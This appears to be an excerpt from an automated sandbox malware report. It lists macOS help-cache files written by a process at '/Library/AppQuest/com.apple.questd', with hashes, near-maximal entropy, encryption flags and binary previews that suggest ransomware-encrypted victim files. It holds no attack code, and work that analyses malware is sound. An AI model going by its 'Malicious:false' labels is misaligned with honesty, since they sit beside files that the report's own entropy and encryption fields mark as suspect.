                                                                                                    SHA-512:6943E92A157C54202DF630BD40572C877B7F2E989D59A481C3AC5ED231D23AE321A2D718CC253E758D57E9100CA2846FF6BB11AE8EB397CEE94A147F8F69154F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: C..y\\0Ho......<R_..w.Yd.!...j>.L..s/.q.i|h:.h|._.].Q...YW.=.....cYY.=.Y.........s)....V.+...4O.!.[..F9..Y.R....bU..r..`.H]LAzQ..&!.`@$...u.L.......;h.....V....i^..od...c..%..;..#A...2.......c...m.9....w..k0jq$...~..Q.......Pd~^.@.l.b...@..sG$I...Q..Nh.^.IC(.qf{.l..:.>$U.{,....e..Xt..}.........`.......p. ..C9...a.x.....$..f........-.........X....7..4(Rc:.@.]...( ?.jB.L..0.......'YP.[...n..]Y..@.-D}..Ro.R.&<...9S....!>..wZRk.......`..>.R2..FvT\.{.[......vk.B&..H.S..........1.FyG..Bj.i+..yD.........M...9...SOF..^.S..J..vx.U...[X....!2........5..I.Bo.=tt...2.........k.l........p..9[P.F.$Yg<...&........3u.T.f{..[z....y.+..W......<....v-...*i.....n..=....`.$.+.-..=..iP.......pQ..z...i.x....tW.....d.8F.|.//......T.EnA...[.eK.p|......].E...I....R#.6..MK9..+..dFaR....~/.2.[Pz.p..."....F.1wr....9....4...S..H.h..z.A..5.g.{.m......)...^...a........m.K..<z....xh..4IO...0$..Gr}{.._=L.....NI.H.&.>.t.;.......'V.............O.0%.....<..+...O,N....{V.....nW....DT7G6.".W......-J......SH....K(.m_U....Xd(
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.SystemInformation.help*10.14/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):11522
                                                                                                    Entropy (8bit):7.964176732316854
                                                                                                    Encrypted:false
                                                                                                    MD5:57CA9B662C67A28F8B12420E6C44CEB9
                                                                                                    SHA1:3B45234AB26217389E53539C2E1E0CF2D674007E
                                                                                                    SHA-256:BB6BCA4B893825D49C508A970146E141A9BF142AD7FFD9B84A58B12C24D7DC33
                                                                                                    SHA-512:D92B83673C61D7ECB3A8EC4F82D7C8F635D9FEB81D56F75F971A91465105EDECBD6F4160C750B503422F823968697C230484F465DABF6E4F23CC43E4C09DE535
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..<P../.v;. ..."....;....`...."..o..}.I..}...&.7].......>+L.Z.....".JH]..G.;..?...%C^9...'...........!..x.....;C.=7.B0..S.m?......V..gV....B...J.8....../{LbVL..bx:.v.....0.zkv.s....fKK...?y........H.....*m...z 2.Q.K.?..V....?......#.....).v./..hUq.Q"..R.....u@....v.1.,......V.LU.z..7<?`\Y.....c.PH........,........wJ....fj......!....~.....[.....%T.....G&8j"_..l...q..5v..._..|...n..56.........../....`J..)N.6U.........nv3>......!.4..t;..|.....K.U.".".Tkq.G..I....5..........d.#e{..U...jQmC5kdr...W....3.......+....\..8lR.~..5).!4..........K.).......k.e-.A.(B.;........Z.....^......f.[@.)n..x..*....G.....T....F.}.....$H..X.......=.'.9..?][{.....Z....|..M@3<ic5.@.Q.-..[....h...^5){......(.5.J"aS].....f..$...8..p=.t.......c7.a..m ..\*..M.g....--..T?MRl7n../_.ST.(.m,.u3.......z..7h....!2Z.w....5~....F.m..A....*N......@..B.%$.Y.......S..x..hp.2:=K.C...C.M..~g.UN.....l.D~E......Uz(..&.......h.{.S.........c6..p...d.]."e.:.u..;.GFJ....E}...Cr.k...w...F..5>...R.D..8.m.....f.U..5.9..4...+.$YQ.#%.....[
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Terminal.help*2.9.4/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):49364
                                                                                                    Entropy (8bit):7.99535142433499
                                                                                                    Encrypted:true
                                                                                                    MD5:B565E2502FC92B909774E00A53C34484
                                                                                                    SHA1:52420D8D2046E7B6366AEB06E55B3F0818FD70A3
                                                                                                    SHA-256:D039176A5B6E5D1B8E3053E3E71366C4BB26DF99963C7B749BD4F3287D229D56
                                                                                                    SHA-512:2A6AC71975A693851ECF06497617156397803D102B5E14E66A789B96C244B27B8785492EA77FF2DFFC3FC16C7D23CA0C3CD7DBA226142EA56E56779FE53FA975
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .kw..3.@...4......-...-.jq.gc. ..a.X.(6.%....7.5.R.....G..*..[.3../..C.q...U..X...;[...E''..l...<...(..}..............V...}3[..0P...)#..R........M.j....]?..4.9......$_..................M.t....-....'.K.,.%9/..zn.....`...%..4..X.7t......+...o..~...?f..~J..9.<{k....T-.zq...P./.-.|..g.a...Tj...e...S....mwy..j"5g6+..v=../7U~._....*.."`v.0.S.U^...8Hl.......&...I.H...o....x:...M.9f.....E...?......SW[....9N.6m..%.......I./;.O.=....m...t6............]..S.;).,.]..(/\..W.W.2i..'.WZ..L..".X.-............n...$q.#....y{......Z..W.3(.kzK.%D...../.....e@ZKY...j!.Qs.....}....+h..,'8..B3.R9......J.O(O.D9..(`..!......k.7..T...:....L.-.f{%d.4.A...X1.3..4.u.~..$..j.. ......*.e.....r\...!.X.Y......J..90...w..i...Z.......V..&78...1>.. .m.....P....7..2.......i...[./.+.[...6.......7t..=.g.[......S...ia..n6.TI.}..t....=Z:-..z..N.#.D...,.x.Lmj4....e.I..#iX]2....U...W.\.......Z.. ...i.Z"M....M.`O.. ....`Y......*2..vLP4.a..2>)..OF.;.......#|sL..o...h1.x8..............ey.F.JX%..E.Y......?.$.&....L8......f.....b....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.TextEdit.help*1.14/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):25931
                                                                                                    Entropy (8bit):7.9886468285542875
                                                                                                    Encrypted:false
                                                                                                    MD5:B876AB15137117A8AD3408CB471D175C
                                                                                                    SHA1:11F078EE28C11355543BA2705FAB79B5693E843F
                                                                                                    SHA-256:EA6CDC799345CB1BE32C8EDAD3B2D154ECDE6DC43AE08F62BEC3EFA0243F05CD
                                                                                                    SHA-512:20AA21F00AAF39B0B76D738620815F5C920BE4AA2EFC897AEDA0D9DB88AC2B9BC14EA34026E01A1A7282E580A9C14229A105B347B348CDA77B8E6AE9E91FDF7E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..9....dy...+.]SN.z..jB...w..l....H..i.s.B9.."[bGb.. ....!\..L']..Z./g.Ui.w`\...z......}&&y..zf$.."......t>.. (Ff...s.=..F.wC.........B..S.;..AJ.F+L...5.....,.H(.G...d..........a.0..:G.|.....<l^..[L=.......Bs....J..g/8.b..<tb...g.n..=m..9o..%b~........0.#..u....c.!...U......p...`.se_+...q.:....l$i:#..f......d.[.T.....O..*v...V5...|.ty..P...O.n"..z..P....w...v.g.........D,o.X.?......:.M...k.;....q.QBd.&.7t...M.$.%..._.W....,.r......../s...hl-.7^....{..0.....Fo...[.......10*...>..2.&........%.""...jT..O.b*.5.-.i...&..B...|...B...=p...6.|.{.... ...E.VF....TX7.l..D.6....8_...J.{4......o..|..n=y..I'o)0....:.,.........J2....F;.*".+U..u.\........W.+.e.+..3)s.=0e...W.........a.i..%&...O<V..1....Yn|.O..X$3....D......J....T6.y..z.:^!...u.....c."oxP^tY......*R...2.....\j.....2w.dH..E.g.....H./....p..K.....?...yM..p_y..*}..-.<9a....3....\..g..iw...........i...(.+...|..`..,.......s..-e..)........wt:....wS...f.0.S5'.x`.*.62...1~*..'...i5K....k.l.j..Q..c.M...E..0. ..{/>..l(..3...#...3.......p..J.P..w
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.VoiceMemos.help*2.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7562
                                                                                                    Entropy (8bit):7.9402992797182455
                                                                                                    Encrypted:false
                                                                                                    MD5:5688298DB3D53E5728B3307C62C6AF0E
                                                                                                    SHA1:8C06D1DD978776A19B2B4F1757B03A6BD4927787
                                                                                                    SHA-256:22D166BD14C5F294652A52C665CBDADE4814441EE1D46B4EA89FFBA5F7D92720
                                                                                                    SHA-512:FCF6B6DB41D572BA31830B82A2BA6C53E6EA8038F1EAD00EE97AE71DE471241C5D3B6532A0D3407AACE7435C8D0C6B8B7E591AA66FE66311C38FAB8307D8CAD4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...S..6..d....U..Ff&9..]...?9..UQ....J..~.B.Ko...b{..T`......\...TbR....-4.........1...9./Z....q0(.............'j...&.F..3j..\2.....{,..(.....`....t....i...R.{....k{.*{.1._.."O..9.:>..P?...2..7..fjM.E.....>.S.!.>..#...?l....M....L..`%.W.>[.[............uE.v....P.....$.z..R...|.PSbq...g...?tT.-..b..N.;.S..%v6........7...N........A...>..[.NL'......'.a....PJ.b.......76...sXms...8%...<J..~...l'x..'.w...;.}\....J...).:..N.R{...C...<...X3f{.SG.?D.5....l..P...%...Y..{....4....}....b.a....5.uZ.>....*';....7...... JY.J.x....!he..,a...r.Q.9...m.W(.:l{U5....'./)...:b.f+p..0..?$.....`......e...F.../....3........x.n...`....z..!.t.Ku....e:....y..T.u.....=.nm:&.....Y..Bu=,^u.N.A.....i..H..'.J.#.fC)_..F.....~n....Jg.r..2....."N.....@.2.$......L..........&.#?n. ....X..~.J..I.L...Zg|..q].... R%...E...r!.i...u.......+6d.......`..X...n,d..F<..U..v..D~,j,.....^.....K....4r......Ce@+..g.Q\q...... ......]).3.....80l.&.^z..A.....Q....&........)........&m.z..p...)....X[5..s.....N....&.W.....d,2...O.....@...}g
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.VoiceOver.help*9/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):110088
                                                                                                    Entropy (8bit):7.997915881150697
                                                                                                    Encrypted:true
                                                                                                    MD5:3724A1989D09EFEBFB90B5E1A807D610
                                                                                                    SHA1:32FE5C44F1ABEC1B73F8223273CA8776EBF7750F
                                                                                                    SHA-256:E455B8FC4A8A41275846DA28954109C171DE04BBDB8CEA11175E9C15E79982C1
                                                                                                    SHA-512:D7ED041567577EA55516AA84C6BCA0D6CC09163DC8B5E128A85654C3AE42BDA99F72EECAE46E2A58D1E8B113EEE3F86404C84B154D5628869446E9CFCA1A3621
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: I...k.{..KI...=..L........j.e.a...o*e..]..a.+.kt... 6?E.d).,....%..Q..*z..he9*Wj....c...s...i.S....:...n......>WW.....).Qf.....~]..x.R.N..._0.Dz.....&....s.R..a./...R=*...b.?{*......8[.bC....J..#..7..?u.4..'...4........:Y\....l\#.*.?T....%3.2].g#9.~[8-..J......,L..[1..c..tFG`...s....V.H.r..o9.Q...-...Y.....(..+..q.r.K.;+..e..9....12......)8{..z.InR..M...{'..%g.{`..j.G.....O...Ip.....`2~f..t.LA..{.....Yw..!....e....g.|-Y............,Ax?.....$t..uE..T.k~.(...N......b.......v.......c.].o..4`N.z..+..j.......AvN..m.q.'..`*9WU.2N..........f.x....P.:...=w}.".[...S.mY......fB+.y...8...$...'.|..:..t..)o.. .....f@...E.^+...'........^.....c+@........j.s.......Jn.?BGJ?.P;...%T!..Z...)..3.....$.D-.......d.....RL.....&0.E..!....h...%3......,.....'.g.jK...5...H.!..-.^y.......= Iw~+.5..EY...2.g.?.%~.3.......-&nF..a.Y..U......A...S.\...rp......6....h..8...~.6...,...d....@u..Q5..........vZ ......F. ._.m.vP.....X#...J.#.=.tP...s............N.~*..t!$.y.k....L...[..uI..~..:(f.O....[of .n.1.E/.9....!...Wt'.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.airport.airportutility.help*6.3.9/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):29459
                                                                                                    Entropy (8bit):7.990313264776257
                                                                                                    Encrypted:true
                                                                                                    MD5:4A4BCC89074CAADC2081C8DB0B3E8293
                                                                                                    SHA1:D27375FF9CB93FA160F2863AB6EECEB1E6286987
                                                                                                    SHA-256:133227746EA9C941EF7305F9BAEDD9A1F3110DA81840175CEB39F190B155BD4C
                                                                                                    SHA-512:EFBB5FC3E06178E06898DA2B709E5267CB647D941A26A03FDD17670C1A6E85E5E44D523890778E3365F84E11D92B9D0AF7B935837450445F0E98C742F1C68FE4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: W....K..5.$...Z.%.(;".bl..... .`..o*e..]O]W........H.`..../b2.B....z,..j...L..z......(..S..f.....T...o ?4.K|......>.&...=....(.es........Tz.lve6..ZIE.I;....S.s.......6Hsg[.5fM...........0.....=...........x..........$.l...=................H..^-...;..v$._WG:|.]..!4w.).H..+.Yc....u..z....(............>....i.gw.c.c.......'.....d...+3..,...PYn.M..(M..A..v.....;......a.h5..g...S.a.m.e.....L...)]....(....a..vU..2F..s...0..g..w..T.o..E..!...l...I..$..J.....!.S..P.-l..2..dQ..d.....>..9.~..;.irY.{}b...x..~w63...>...b.4Q`b.V..oQb..v..d..G4..=C..|.uf.o...[..._..N...WwO...@....U..e..$....H...M.x.....qX...Z..9j...h3.....}3....3..z_.%....8.ck..P..5..q....% ..S.".........A..@.@.....dlx.#....a .r..6.._k|4...HI.i...d...?".nb..?....}uG..&l..Z......h..u2Y.,....@..h....S`...2. ..y.c..Ld......Y...?&.<u.d....-...&B.]BsP:..f...v.{X.v.......@".4'..@.....qA.....C./...s-.0...K....j.M.~.(..x:.r.../....T..K...w5...oB.^1.M...,.2E+b......$..l.P..)......I).b..!\.Q....L/q.....7f.....M..y...wfdt.o(.....ej.........W...A
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.colorsyncutility.help*4.14.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):8530
                                                                                                    Entropy (8bit):7.950244818322557
                                                                                                    Encrypted:false
                                                                                                    MD5:0BA4B3B2913AC7CCD073B7EBB96C6D22
                                                                                                    SHA1:F14AC0CA334EFBFD6D7171BF7534C25D1EE81B4D
                                                                                                    SHA-256:5E32DE8F9A5A3C212206C4F02D2CD973114763E7F95E96B5FF3BC50D5F564306
                                                                                                    SHA-512:20D6239029900728C43B078ED8B024B88A45C07904E1BC2DA4D9F937845A96D95775B0A02B664B90C5B94C892EFCB453C0B391723630BDE938C696AC4A3F7933
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: 3...EK.h.%.....i........?...Jk...a..m.>M....T...a....n.......U^..4a..f......I"B..5...K..-*A.......v.......j.GQ.....wKq....+1/...VaJ.\....EL'E.`.z .Q}3a....=...A. ...V.....fy.b:A...u.B...#o...2.SO.'IpDUM.a........r.T#W../.....W....X..P$...Vt.q....:Z.F....81..<........w.....j.u...C..J+...t.T.......*..p.+z..g......XR.h..8J...[.l9p........^.nd.~?...f.H....t.fL....*_._QV..c...=+.yq...0.o2..U4Z.2..........>...4X.Ae:....%m6.G...)NZ..b./.0........>.2.....b..kqB.....5..K.!2.....w..f........}..Z.,.O..E..,5%.>A.JiV...q.5.....N.......h..5y........x.!....{......})...p....4..$..[w....W....A{.....`..k. c......T..h,.e.~.MKW.+dh6.P..0......0CX..S...l...L..........-.........z .1.|.tuS.....T.`.1tS~...@...S.g.2...!...u........tGKcW.....b.z.5........>...Q..^.#L....Q9//.mE.......Vd.{...).au...M....A.u.F]..s>......2.S.~..M.K........O.{..Y.....jy......i...$Eo.V_j[.............3.(O...l..p......1.y!.0w..s.e.w0.s.......xP8..F^M.6.e.m.9...x...7..6a.i......&[...e....V.LR.V.6..io...0..o..{-..x......-W...A..;..{.P..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.digitalcolormeter.help*5.13/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2442
                                                                                                    Entropy (8bit):7.73377829919916
                                                                                                    Encrypted:false
                                                                                                    MD5:6D85FCDE5656AA1B5AC7817CD3121F72
                                                                                                    SHA1:28DC0E0558585DFABA2EAF9BC660F6A8D6E28ABB
                                                                                                    SHA-256:211A69970E654A4D4533DE091779E3E673DF362501AD88F4F040C0C832F2A021
                                                                                                    SHA-512:A9CA2CF7C6311DA35B6DE0C14FAD38ADFDDFDB97DDFCACFCF18C0A25857FD57100295C5D7F49FB583754A901C31378332872F9D38DEDBBD315030B4C63D8823E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: 5..S..s....P...x.%a...[H...*#i.....C{..>0.6Z,. {Zq..o.AN..........W./...;...r..O...kV._.T..h.fD71N.d.O...<m......}.s..0...[..7'.T......&.P.S]..x1.?a...G..ZR.Q,.'......Ge..#.v....!.0.~.py0.xz4./.....y?.K,.C.F.....TJh.'..-.o@.q&A....Y.*.6.XW...6..6..3$...~Y...C.......\.r.W..u.{..]?*..b.4;#s....7..Is.*Iu....p_.... .,O...B.\.......%.....'.\6.X...........f..S+.X....;....0.._.$a..8.`..].?.R.....d...}..?...Y.....)...E.....mr?.O.;....._...llU.J,.=-1....7..1.....mt|.9s(C:...)...`..h+..... .......g...&.]$..n...4%._b..x..!.._Uf.7..l..bk.....".V..:k0.0..$.|..1..9..t.........~.......n.D.Q................Q[..Ab..0Y.....a.'L..V.QE..$...LX%...[_>g..T.,|...h=....`b*..-.Q.9@......a).Y.{X..#..T...f..x......}..Z..J..(...H.#z..5&.....5WWu.]T....qs...h......k..........1.Az..B.l......2ux.e..TP....j@...^...9_.x.vM...e..+.2..7wS.x...#..Nw..G...F.....J..k............ GP5...{..........>4...f.....J.....D.C.....:......6.........x.7.....JX...I....Pb..B...:.!>..yg,....eF.5.......)z.`..2..U..&.,m..,P....C.........(..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.iBooksX.help*1.18/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):22851
                                                                                                    Entropy (8bit):7.98695596013818
                                                                                                    Encrypted:false
                                                                                                    MD5:6738D45FA6F2DA140B6CCB9B715E8B0C
                                                                                                    SHA1:DD5925332218FB9EB58954F8BF414D14C039B78E
                                                                                                    SHA-256:7E12B5F46B8D2C2B2F01D6021EBFD2F70D4D2B1E8C8F69F300845BCB2329952E
                                                                                                    SHA-512:68535E18052189341B9988DCBD89ED46E646B77840B64719D9A51154785D7E1BC27AAD051D6D9C703A661C98AA87BD28A8CD155554526DE72C0CDCDF236E7E6E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: p.p;.......B,...S.....s.T1.*2.Jt.b.w.=4....S:f].1...H...........t..}DoYA..~....d.8...t.g.....b.X."..(..._ *..8....|#D.2j...[.d.X.Bs.(.v....X..X............g.....h>RP...a..g...6......8[.?r.w<D..+w....`..P&... ..0D....X.......X...H.uw...D.....aO"......E.<S..J]...a.:..'.J9.G..{.U..X.....r.w.JV..L...}.K-U...z..."j...K...l....V.}K.B..F.a.)..[F..O.0..4.BW....:........dW.O....r.x..||E..9...g<...`......=......i.m.k?A;B.Xs'"...'........]..`..iV.,..%5.u..X#...4nk.H.'Y4.....O..a..j........^G..9y.....c..-%.....-}..`I..,L.0...c.7ME-.8.t.D.p`o.F.S.6Y....?.V......W...,$..H..[......!...b..S......<..}.....Z.CH...O.B,......Ml.!....?......n..e...N..&`.\.*..9.M.._........,.e8.uHa9...KM..G...l.Y..Zus.ml.)...$gn...j.f.>z...B|....C.F!C.u.:...D.V.VD..........PR......"k+..{F.......B$..W..". ....=].h....3w.Z.Id.X.Y+.I......-..g.:..#AKpT...m.u...M.7.Y...+.......!u..1i.....p..c.,..&.%..3.7.{.....5...I@..Y...b....Ic.qR..s7.......f... .i....VA..&;.?1~. ..3oK.u..._4......!..a9...O.Z..`.e:[sQ&.+..3t.}W..e.>....$.z.Iy
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.iCal.help*11.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):51789
                                                                                                    Entropy (8bit):7.994979041334495
                                                                                                    Encrypted:true
                                                                                                    MD5:ACAC9E40B7BF3CFCA36AD0B8677BB4DD
                                                                                                    SHA1:A4237843A37B66CF6CCBE19D34D57F26A6E9469D
                                                                                                    SHA-256:309724FC62C525ABE2471F3C18EB5EC214CC839F0EA75AD0C21E6AF141AE811A
                                                                                                    SHA-512:F445FF2180C2B0F1DBE7AF25065ECBE7346747CF2F1CFACF448BAB66D4F771195B8331537AA4590AFFEAE1CD5D7948B6EA8074171633584E7EEE9F6692B73021
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .9.....E.o..a_v..Dvx..?..n....r."-.....U>..pk.b.f,.*-Z...~..H.... .._ ..B.A,....1.O..r.........4.tk......>.V........Fv.../...#....(...K.....SiGB(;.<fv&.....Q....<............PD........-....9B(.".C.$.._E6..b.CM..H..`..,.....8...m..v@..8.u..Y....IC..6.W..'...`]........`...K.-..`.......$F....Zt..y....D...>.m,......]~.J ....C...c.C.(3.nc,..+!-....c....n.._.K.}.VO".V.....+,..y/..b.......WV.`MX.A)..1^E(..+.q.]B........M.~.ip.j.9....O.V....]A.).P.A...1..||...$b.r...A...~.&.r..1.&......P.3....G. .h...z..]......D.....44.......MND..IG:7......]&...s.j..e..{-?. .O..._v.u)...T N0..4?..s-d...X...'..Z...-z....q.h!4.!.9...........zyx...u...........LZ.........{...6.j.&g....;...'..Im..{._...l..&...P..a..C.;.ls..(..T..)~t(.b;E..........80.......X.m.........:......b...(.q.:q..%34..]...........rJ...7.ZmF.0s.v..W>J..h.O,.V.....).....f%..!{49W..p.E...T_..*..b....D]k-N....Ms.X.w...YH2F....c...<=.6...M..s.......1K6B.....j.2.....E.!..C.......c...~%8.8.C..Z...."...KZ+...=.;T. .}.Fd...q.!.......}H.......JMn...t..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.iChat.help*12.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):25403
                                                                                                    Entropy (8bit):7.988696048842475
                                                                                                    Encrypted:false
                                                                                                    MD5:39DF789072F16F30A774B76C346F01DF
                                                                                                    SHA1:2AC5372212EAADAC170BD9EC7A730505C09AC6B3
                                                                                                    SHA-256:3873A2F4369F0C8C1C84EA745BE5335452C0F70898A22EADD21CE84917950014
                                                                                                    SHA-512:FE2F6E1EE2A03F7A0F233ABAEA6D46A274F9860B2C61AC4C5D5F193A07452A1E57A65CF1CB17F4A2322AD045D656CB3BEE1057B263F6590BC9AB8D0FE1D58125
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...0....1.-..A2......6.#..I'4..."-.....U.f..N....t2.}.g|.....o..n7.......E....15-....W.........h%zw.uF..J..Ju..k/........]...=..nW.=h..O4.....Ip.....w*J.........w.P.z.VA..d.....|.h....<..v.....4.7....hJh.P.u..K.).#{..'.k.a....P.G.H.R.h %.g.y.F..8....a../.Y..3......P.~"J/......K&......M5%k......j.{*Fz.........A..y.O.].V.z6*.....\.'.,s...z....i...Z2.A.q...Lk.}.e.|.....c|....+....?f......P.;......S....6R|.....5A..^H..f=..@29L.c..t..{o....4.1......k.iq}2r+&Yk..kOwg........2.0.pFrL.YX.-....q>....Mo.p7.<..=.ZK..Ct...W }s.I...oM........T.......^#...'.;<t.B....}da;...m/....m....1.~ON..@a,...X..........2m.m.3R...StvQ.....I..|=..,...l08vp|..a.(.s...'/N.)..Y.4.....B........Clg1...d.>.s..,.....J...3...k....7{...sJ..W....@K....:]....Odk..<f.#....R....r./.W...[.~.tQy..(....y......?....!KR....*...J.......1`..;..",.t....U[B..r.u....~X.....S.u...e..1.A.4$.@......s.....=wyc..G.>P[/7T..],..........;seVxx.Ip ..\'/-].og..H........F..<....$:.|.=f..c..jY..X.R...>...W.Z.,Qu.c..Z#.2.....Y..C.c.t..!%..Wbi.p".%.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.iTunes.help*12.9.4/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):132618
                                                                                                    Entropy (8bit):7.998391382005952
                                                                                                    Encrypted:true
                                                                                                    MD5:0FADC4FFA3D51F0D00812FC2ECD35FEA
                                                                                                    SHA1:5E78016749B7912191049222BE9AF87E160058B2
                                                                                                    SHA-256:5463FDFB456FB7CB827C4293DFF25FDB37B81D4E8F2139FAFC9467BCCDFFF9AB
                                                                                                    SHA-512:29540941E3DF0CC1C1F601A2D86BDB1F045036893C1CB7AFB9F6755B39BD8221D14077C6D90DC9BB6CCAC586120EB7317F8AA2BA2B732518B26D4BE2A931E597
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: Y..Q 4G..p.......h>L.......7..C$.z..c .4_/m.m...H...hdEz.+kW.*L>2P..*&.I...... /X.Y......y.NGN.W%W..h}.......r.#..S...5.Z..kq....m.....w..@....................A...... ...|...W.......8[....N.....p...$Z...c^S.g.T?.+. ...Y.)(..nNzFb."...2w..DBr...).........wh.b.....L.A.%.&.x0...^9..{.).>..W=..;.{.)0..0.y(qm...>{.$...y....."#3........>~.e....st...Kq+......1..T...y.....n.\....%..K$~6C....q..[.....wR..3.8gB9.....".M.....0.HR....]LMC'.......uA......q.z.`.62..R....gFJ...VoQ.1I..V.....bu.S@k........]4.....x~.X;v..]..<t...;.3.....va....ic..L.oh.........5f..a.w.}..........5.......Pu.9*.w..:......[uK.......{..x.=..Jn....B...0B......c."......c..!..Y.~..967..E....."2Q..e...D.A.C...d5.^...IC.:4..a..E..k...Qu..g.e...m.Y....AX..T.<.........W.s9.....6.!,Iy.]bQ.|.l..B"...J..Y..%.>~....~.*[[-...E.n.p...V.......t./..5Of//.#.....&..*o..Tb..n...n8M :......_.L.....|....w;..#...T.N.....3..t....Yw...wiX?.......$2.>.\.......J....,.F.Yz......x..;H.I.kN..=.Q7P.aJ...]....>O...R.z.~I.bD.....r$I^.~.hU...8clj..d...&5.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.keychainaccess.help*10.5/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):20771
                                                                                                    Entropy (8bit):7.983578288945365
                                                                                                    Encrypted:false
                                                                                                    MD5:1153EB8AC72ECC74520C19B8B273879C
                                                                                                    SHA1:40DDFF221398B6E720F5EB9BB9C66E677D1A6E0E
                                                                                                    SHA-256:EC8FA1A1299D9C60CD2851E0790F14689888F334C3B225A9E84A5E7FFFF024C1
                                                                                                    SHA-512:8D459F70A4D3E5310F341BE0C6764D4EE6ED82C34B7B1403ABF2DAE2266F88FF1FE4774B2AA40E6768C9FC6FDDC6E6AA9FDF2804C3D9E48FA82B204CCDE2BD4C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: "..."..\t.9.....p....l....%.]y..76........5....f..Z..!..e...3...../.o..y....t........?=...........b...].O.....h4,..5-E...I........p.n..(.....[23.....,..1...dj..4?.....A../.....B.......TbTf...OM..*.s.......HZ_.T!..w.....Do...N.K........K./jE....r1$.8.%~aq.P.|q. ..+.X..,*.#.n.....C5..8.....~..}...y..p*......M}+}._....;v.......P.5K.7...Pn...u\....B.....U..Z...........O...Yw&1.-N.&...C6..O....nTzo..._.q}.~@.........8..D^.....Z..W....$.f...$....)...........aL".K..*.[6j;.....$A..l3........=........Wm..H.m.Q. 3.7w..U.hYc_n8u.I<.)...c..y:cZl.n0G...g......5_.L..%....:.....H3...v..s.C;h.....0.9.?>.#.*a.......5.ktH7....rB...n..6<.R..B.;..f".... ..ZD.T.6.4....I_A-. .....(..d\.7.(.......q..............N.,P.@......o"..x...g......O..~..o..2...K.......0...S...1e.P...:...".c(....R..A.i.<.).o&.i.a.......v....O......\.)......dr]..1.~...n.6x....$m.Z2..I.Y...e.:.....l..q...,..74...^t.s.0......o.....A..[....b..k?..._$/..%.x.m.,..%.h...qs*..^..2#.>Q...%'Ub......m.se..v..v.Y....|..... /..i..........f....t9Q(.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.machelp*10.14.4/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):836733
                                                                                                    Entropy (8bit):7.999736788308352
                                                                                                    Encrypted:true
                                                                                                    MD5:96CA94B0A4ABC49321BC9BCAB532E702
                                                                                                    SHA1:94DAB789437E7214CC41F730ECF6B75AC8B9C41A
                                                                                                    SHA-256:4E2455B403AA656CEBC9E2EA5D50F8A2D363235DCDB4842CA03AADFD0479B841
                                                                                                    SHA-512:F0ECBC19E19DE95A03E5D1CFF6DC1B4F2F7501C98CCC8CABD34DBDF1D5CC406B0CE0ACA9049285D59E0BAD95E579296AFFEA957FC27F0FE4422CBC51C16D2F99
                                                                                                    Malicious:false
                                                                                                    Reputation:low
